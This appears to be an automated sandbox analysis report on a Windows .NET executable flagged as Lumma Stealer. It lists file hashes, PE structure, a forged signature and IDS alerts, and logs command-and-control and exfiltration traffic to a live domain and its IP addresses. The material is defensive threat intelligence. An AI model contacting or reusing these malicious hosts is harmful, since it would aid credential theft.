Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675737" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421704737812632
Encrypted:	false
SSDEEP:	6144:kSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN/0uhiTw:vvloTMW+EZMM6DFy503w
MD5:	15C8FBD569466BA0705074060287773A
SHA1:	1BA5DF26BA1685FB2C09049D78778864DCA85FF2
SHA-256:	64496447304B4D65944E5C38D23FDA41C98A8BE31C328F5EBD3DC4437A8B8192
SHA-512:	B1C81514EDC493081AEB5A013E0906380C54A82A9DD258485E0A8098F50665ABC5D70FEEC9C02B3606DA7F5E757EEBC00313A7720F1B4040A0DCB9E90374FB5C
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..}..f..............................................................................................................................................................................................................................................................................................................................................+5j-........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.636437154879793
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	mWAik6b.exe
File size:	456'304 bytes
MD5:	16a53e18ca53fe602974f0a4b7ffbf3c
SHA1:	8c4b935040158b1ba65a599413b14e8d9e3b975e
SHA256:	bb3b567a9f65a64f444738b2c73e8698db247a6b78aa0d1c6ae6cd05bdcc31a9
SHA512:	678056adbf4bd491d9e980b79ed587bb7f04c1acfcbbfabbbe8d1d04de401beaa8ba4ebd84cf2e4cbbef49dc1d98f13f99bedf2afeca162da186d852577b29cd
SSDEEP:	12288:zA0WK2+gqm3fsyXAyqVEOkg1LIRgxVPTLTl:00tmLgVCgLWshTl
TLSH:	F0A4D0686A68D537C2AE4775E4E3511263F1A4D3FD62F745BC8804F24D12380AA7A2FF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2.................0.............>.... ... ....@.. .......................@............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x421a3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	08/10/2020 02:00:00 12/10/2023 14:00:00
Subject Chain	CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
Version:	3
Thumbprint MD5:	332CDC164B1324C3FF3F64E228C5FFFC
Thumbprint SHA-1:	CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
Thumbprint SHA-256:	531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
Serial:	0C9838F673F9B1CCE395CFAB2B6684E4

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x219f0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x22000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x6d000	0x2670	.idata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x219a7	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1fa44	0x1fc00	7c297cc8f463f81875ed0f7ba3dd3ff0	False	0.4013056717519685	data	5.796591200875089	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x22000	0x598	0x600	511dd0b163083f747b4fa3f1e450067c	False	0.41015625	data	4.038713703339799	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x24000	0xc	0x200	b1171333753a88cda4e7356665065f4c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x26000	0x4c800	0x4c800	7de813a6b35a7da0967b3dd52fa25e14	False	1.0003382863562091	data	7.999390808292112	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x220a0	0x30c	data			0.41923076923076924
RT_MANIFEST	0x223ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T16:15:10.078904+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	172.67.150.129	443	TCP
2025-01-14T16:15:10.627860+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49705	172.67.150.129	443	TCP
2025-01-14T16:15:10.627860+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	172.67.150.129	443	TCP
2025-01-14T16:15:11.108776+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	172.67.150.129	443	TCP
2025-01-14T16:15:11.585608+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49706	172.67.150.129	443	TCP
2025-01-14T16:15:11.585608+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49706	172.67.150.129	443	TCP
2025-01-14T16:15:12.429285+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	172.67.150.129	443	TCP
2025-01-14T16:15:13.839625+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	172.67.150.129	443	TCP
2025-01-14T16:15:15.246349+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	172.67.150.129	443	TCP
2025-01-14T16:15:16.391120+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49716	172.67.150.129	443	TCP
2025-01-14T16:15:19.932487+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49716	172.67.150.129	443	TCP
2025-01-14T16:15:20.742313+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49719	172.67.150.129	443	TCP
2025-01-14T16:15:29.547266+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49760	172.67.150.129	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 16:15:09.612021923 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:09.612107992 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:09.612209082 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:09.613903046 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:09.613933086 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.078810930 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.078903913 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.121494055 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.121520996 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.121865988 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.172396898 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.203718901 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.203761101 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.203871012 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.627815962 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.627897024 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.627966881 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.630580902 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.630613089 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.630635023 CET	49705	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.630640984 CET	443	49705	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.649111986 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.649161100 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:10.649267912 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.650924921 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:10.650937080 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.108670950 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.108776093 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.137386084 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.137403965 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.137698889 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.138998032 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.139020920 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.139072895 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.585609913 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.585691929 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.585767031 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.585799932 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.585829020 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.585879087 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.585885048 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.585968018 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.586019993 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.586025000 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.586292982 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.586349964 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.586354971 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.590491056 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.590565920 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.590570927 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.641051054 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.641083002 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.672182083 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.672208071 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.672264099 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.672291994 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.672307968 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.672343969 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.672375917 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.672605991 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.672621012 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.672636986 CET	49706	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.672642946 CET	443	49706	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.939053059 CET	49708	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.939116955 CET	443	49708	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:11.939184904 CET	49708	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.939873934 CET	49708	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:11.939889908 CET	443	49708	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:12.429176092 CET	443	49708	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:12.429285049 CET	49708	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:12.430881977 CET	49708	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:12.430911064 CET	443	49708	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:12.431207895 CET	443	49708	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:12.432439089 CET	49708	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:12.432631969 CET	49708	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:12.432682991 CET	443	49708	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.339165926 CET	443	49708	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.339297056 CET	443	49708	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.339432955 CET	49708	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.339621067 CET	49708	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.339643955 CET	443	49708	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.356189013 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.356242895 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.356348038 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.356672049 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.356692076 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.839546919 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.839624882 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.840919971 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.840929985 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.841178894 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.850585938 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.850636959 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.850661039 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:13.850708008 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:13.891345978 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:14.447160959 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:14.447261095 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:14.447320938 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:14.452724934 CET	49713	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:14.452754974 CET	443	49713	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:14.776185989 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:14.776230097 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:14.776309013 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:14.776618958 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:14.776631117 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.246203899 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.246349096 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.247669935 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.247688055 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.248203993 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.264863968 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.265010118 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.265072107 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.265194893 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.265208006 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.777400970 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.777513027 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.777565956 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.777729988 CET	49715	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.777745008 CET	443	49715	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.921300888 CET	49716	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.921401024 CET	443	49716	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:15.921499968 CET	49716	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.921830893 CET	49716	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:15.921866894 CET	443	49716	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:16.391024113 CET	443	49716	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:16.391119957 CET	49716	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:16.392426014 CET	49716	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:16.392457962 CET	443	49716	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:16.392693043 CET	443	49716	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:16.393714905 CET	49716	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:16.393811941 CET	49716	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:16.393831015 CET	443	49716	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:19.932498932 CET	443	49716	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:19.932599068 CET	443	49716	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:19.932689905 CET	49716	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:19.932949066 CET	49716	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:19.932991028 CET	443	49716	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.269002914 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.269052029 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.269141912 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.269450903 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.269463062 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.742114067 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.742312908 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.743474960 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.743482113 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.743760109 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.745048046 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.745716095 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.745740891 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.745846987 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.745862007 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.745964050 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.746037006 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.746157885 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.746181965 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.746314049 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.746340036 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.746469021 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.746484995 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.746498108 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.746516943 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.746710062 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.746743917 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.756113052 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.756303072 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.756346941 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.756369114 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.756408930 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.756540060 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.756565094 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:20.756592035 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.756608963 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:20.756645918 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:29.360846043 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:29.360955954 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:29.361176014 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:29.361299992 CET	49719	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:29.361314058 CET	443	49719	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:29.372662067 CET	49760	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:29.372699022 CET	443	49760	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:29.372817039 CET	49760	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:29.373173952 CET	49760	443	192.168.2.5	172.67.150.129
Jan 14, 2025 16:15:29.373189926 CET	443	49760	172.67.150.129	192.168.2.5
Jan 14, 2025 16:15:29.547266006 CET	49760	443	192.168.2.5	172.67.150.129

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 16:15:09.590918064 CET	53970	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:15:09.604902983 CET	53	53970	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 16:15:09.590918064 CET	192.168.2.5	1.1.1.1	0xfb9b	Standard query (0)	cultureddirtys.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 16:15:09.604902983 CET	1.1.1.1	192.168.2.5	0xfb9b	No error (0)	cultureddirtys.click		172.67.150.129	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:15:09.604902983 CET	1.1.1.1	192.168.2.5	0xfb9b	No error (0)	cultureddirtys.click		104.21.90.4	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cultureddirtys.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	172.67.150.129	443	940	C:\Users\user\Desktop\mWAik6b.exe

Timestamp	Bytes transferred	Direction	Data
